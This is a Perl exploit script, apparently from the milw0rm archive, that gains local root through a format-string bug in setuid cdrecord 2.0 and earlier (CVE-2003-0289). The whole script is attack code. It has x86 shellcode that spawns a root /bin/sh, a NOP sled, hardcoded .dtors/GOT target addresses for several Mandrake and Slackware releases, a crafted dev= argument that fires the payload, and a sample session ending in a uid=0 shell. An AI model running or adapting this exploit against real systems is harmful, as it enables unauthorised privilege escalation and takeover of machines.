CDRTools CDRecord 2.0 (Mandrake / Slackware) - Local Privilege Escalation - CVE-2003-0289

1. #!/usr/bin/perl
2. ###########################################################
3. # Cdrecord version 2.0 and < local root exploit.
4. #
5. #
6. #   [wsxz@localhost buffer]$ perl priv8cdr.pl 4
7. #   Using target number 4
8. #   Using Mr .dtors 0x808c82c
9. #   Cdrecord 2.0 (i586-mandrake-linux-gnu)
10. #
11. #   scsibus: -1 target: -1 lun: -1
12. #   Warning: Open by 'devname' is unintentional and not supported.
13. #   /usr/bin/cdrecord: No such file or directory. Cannot open '. Cannot open SCSI driver.
14. #   /usr/bin/cdrecord: For possible targets try 'cdrecord -scanbus'. Make sure you are root.
15. #   /usr/bin/cdrecord: For possible transport specifiers try 'cdrecord dev=help'.
16. #   sh-2.05b# id
17. #   uid=0(root) gid=0(root) groups=503(wsxz)
18. #   sh-2.05b#
19. #####################################################
20.  
21.             $shellcode =
22.                     "\x31\xc0\x31\xdb\xb0\x17\xcd\x80".#setuid 0
23.             "\x31\xdb\x89\xd8\xb0\x2e\xcd\x80".#setgid 0
24.             "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89".
25.                     "\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c".
26.                     "\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff".
27.                     "\xff\xff/bin/sh";
28.  
29.             $cdrecordpath = "/usr/bin/cdrecord";
30.             $nop = "\x90"; # x86 NOP
31.                     $offset = 0; # Default offset to try.
32.  
33.  
34.      if (@ARGV == 1 || @ARGV == 2) {
35.                     $target = $ARGV[0];
36.                     $offset = $ARGV[1];
37.             }else{
38.             printf(" Priv8security.com Cdrecord local root exploit!!\n");
39.             printf(" usage: $0 target\n");
40.             printf(" List of targets:\n");
41.             printf("      1 - Linux Mandrake 8.2 Cdrecord 1.11a15\n");
42.                     printf("      2 - Linux Mandrake 9.0 Cdrecord 1.11a32\n");
43.                     printf("      3 - Linux Slackware 8.1 Cdrecord 1.11a24 not suid by default!!!\n");
44.             printf("      4 - Linux Mandrake 9.1 Cdrecord 2.0\n");
45.             exit(1);
46.             }
47.  
48.      if ( $target eq "1" ) {
49.                    $retword = 0x0807af38; #Mr  .dtors ;)
50.            $fmtstring = "%.134727238x%x%x%x%x%x%x%x%x%n:";
51.             }
52.      if ( $target eq "2" ) {
53.                   # $retword = 0x08084578; #.dtors
54.                    $retword = 0x08084684; #.GOT exit
55.            $fmtstring = "%.134769064x%x%x%x%x%x%x%x%x%n:";
56.             }
57.       if ( $target eq "3" ) {
58.                    $retword = 0x0807f658;
59.                    $fmtstring =  "%.134745456x%x%x%x%x%x%x%x%x%x%x%n:";
60.             }
61.        if ( $target eq "4" ) {
62.                    $retword = 0x0808c82c; #.GOT exit
63.            $fmtstring = "%.134802669x%x%x%x%x%x%x%x%x%n:";
64.             }
65.  
66.             printf("Using target number %d\n", $target);
67.                     printf("Using Mr .dtors 0x%x\n",$retword);
68.  
69.             $new_retword = pack('l', ($retword));
70.             $new_retshell = pack('l', ($retshell));
71.                     $buffer2 = $new_retword;
72.                     $buffer2 .= $nop x 150;
73.                     $buffer2 .= $shellcode;
74.                     $buffer2 .= $fmtstring;
75.  
76.             exec("$cdrecordpath dev='$buffer2' '$cdrecordpath'");
77.  
78.  
79. # milw0rm.com [2003-05-14]
80.